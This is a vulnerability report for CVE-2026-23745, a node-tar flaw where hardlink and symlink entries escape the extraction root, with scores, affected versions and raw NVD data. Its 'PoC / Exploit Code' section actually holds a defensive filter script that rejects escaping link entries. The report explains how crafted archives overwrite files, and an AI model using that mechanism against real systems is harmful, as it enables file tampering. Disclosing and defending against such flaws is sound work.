Security Vulnerability Report
CVE-2026-23745 CVSS 3.1 base score 6.1 MEDIUM (the CVSS 4.0 secondary score in the raw data below is 8.2 HIGH)

CVE-2026-23745

Published: 2026-01-16 22:16:27
Last Modified: 2026-02-18 16:20:08

Description

node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:isaacs:tar:*:*:*:*:*:node.js:*:* - VULNERABLE
node-tar < 7.5.3
node-tar <= 7.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
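'use strict';

// node-tar is published on npm as `tar`; the original script required a
// package name (`node-tar`) that does not exist on the registry.
const tar = require('tar');
const fs = require('fs');
const path = require('path');

// Defensive check for CVE-2026-23745 (node-tar <= 7.5.2).
//
// Per the advisory, Link (hardlink) and SymbolicLink entries had their
// linkpath left unsanitized when preservePaths is false, so a crafted
// archive could point a link outside the extraction root. The fix is to
// upgrade to tar >= 7.5.3. The `filter` used below is defence in depth:
// it refuses link entries whose target escapes the root and reports them,
// which helps hosts that cannot upgrade immediately and gives a signal
// for logging suspicious archives.
//
// Usage: node <this-script> <archive.tar>
// With no argument it only prints the affected/fixed version lines, which
// is all the original script did at runtime (its async function was
// defined but never invoked, and tar.extract was called without any
// input archive).

const EXTRACT_DIR = path.resolve('./vulnerable_extract');

/**
 * True when `target` (absolute) lies inside `root` (absolute) or equals it.
 * @param {string} root - absolute extraction root
 * @param {string} target - absolute path to test
 * @returns {boolean}
 */
function isInsideRoot(root, target) {
  const rel = path.relative(root, target);
  if (rel === '') return true;
  // A relative path that climbs out starts with `..`; on Windows,
  // path.relative across drives yields an absolute path instead.
  return rel !== '..' && !rel.startsWith(`..${path.sep}`) && !path.isAbsolute(rel);
}

/**
 * Decide whether a link entry's linkpath may be materialized under `root`.
 *
 * Hardlink ('Link') targets name another entry in the archive, so they are
 * resolved against the root; symlink ('SymbolicLink') targets are resolved
 * by the OS relative to the link's own directory.
 *
 * NOTE(review): this is a static check on the header value only; it does
 * not follow links created by earlier entries in the same archive. It is
 * detection/defence in depth, not a substitute for upgrading to >= 7.5.3.
 * It also assumes POSIX separators in the archive — confirm for Windows.
 *
 * @param {string} root - absolute extraction root
 * @param {string} entryPath - archive-relative path of the link entry
 * @param {string} linkpath - raw linkpath from the tar header
 * @param {string} type - node-tar entry type name ('Link' | 'SymbolicLink')
 * @returns {boolean}
 */
function isLinkpathSafe(root, entryPath, linkpath, type) {
  if (typeof linkpath !== 'string' || linkpath === '') return false;
  // Absolute linkpaths are the case called out in the advisory; reject outright.
  if (path.isAbsolute(linkpath)) return false;
  const base = type === 'Link' ? root : path.dirname(path.resolve(root, entryPath));
  return isInsideRoot(root, path.resolve(base, linkpath));
}

/**
 * Extract `archivePath` into EXTRACT_DIR, skipping link entries whose
 * linkpath escapes the root.
 *
 * The entry object exposes the header field as `entry.linkpath` (the name
 * used in the advisory); the original script read a non-existent
 * `entry.linkname`.
 *
 * @param {string} archivePath - path of the tar archive to extract
 * @returns {Promise<string[]>} descriptions of the rejected link entries
 * @throws propagates errors from fs/tar (e.g. unreadable archive)
 */
async function extractSafely(archivePath) {
  // recursive: true makes this a no-op when the directory already exists.
  fs.mkdirSync(EXTRACT_DIR, { recursive: true });
  const rejected = [];
  await tar.extract({
    cwd: EXTRACT_DIR,
    file: archivePath,
    preservePaths: false, // default secure behavior; kept explicit on purpose
    strict: true, // treat tar warnings as errors rather than silently continuing
    filter(entryPath, entry) {
      if (entry.type !== 'SymbolicLink' && entry.type !== 'Link') return true;
      if (isLinkpathSafe(EXTRACT_DIR, entryPath, entry.linkpath, entry.type)) return true;
      rejected.push(`${entryPath} -> ${entry.linkpath}`);
      return false;
    },
  });
  return rejected;
}

/**
 * Entry point: print the version range, then, if an archive path was
 * given on the command line, extract it and report rejected link entries.
 */
async function main() {
  console.log('Vulnerable versions: node-tar <= 7.5.2');
  console.log('Fixed version: node-tar >= 7.5.3');
  const archivePath = process.argv[2];
  if (archivePath === undefined) return;
  const rejected = await extractSafely(archivePath);
  for (const description of rejected) {
    console.log('Rejected link entry:', description);
  }
}

main().catch((err) => {
  console.error('Error:', err.message);
  process.exitCode = 1;
});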

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23745", "sourceIdentifier": "[email protected]", "published": "2026-01-16T22:16:26.830", "lastModified": "2026-02-18T16:20:07.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3."}, {"lang": "es", "value": "node-tar es un Tar para Node.js. La biblioteca node-tar (&lt;= 7.5.2) no sanea la ruta de enlace de las entradas Link (enlace duro) y SymbolicLink cuando preservePaths es falso (el comportamiento seguro predeterminado). Esto permite a archivos maliciosos eludir la restricción de la raíz de extracción, lo que lleva a la Sobrescritura Arbitraria de Archivos mediante enlaces duros y al Envenenamiento de Symlink mediante destinos de symlink absolutos. 
Esta vulnerabilidad está corregida en 7.5.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": 
"LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:isaacs:tar:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "7.5.3", "matchCriteriaId": "BF78DB31-ACED-49B8-ABE8-ADD4C5E4DAF6"}]}]}], "references": [{"url": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}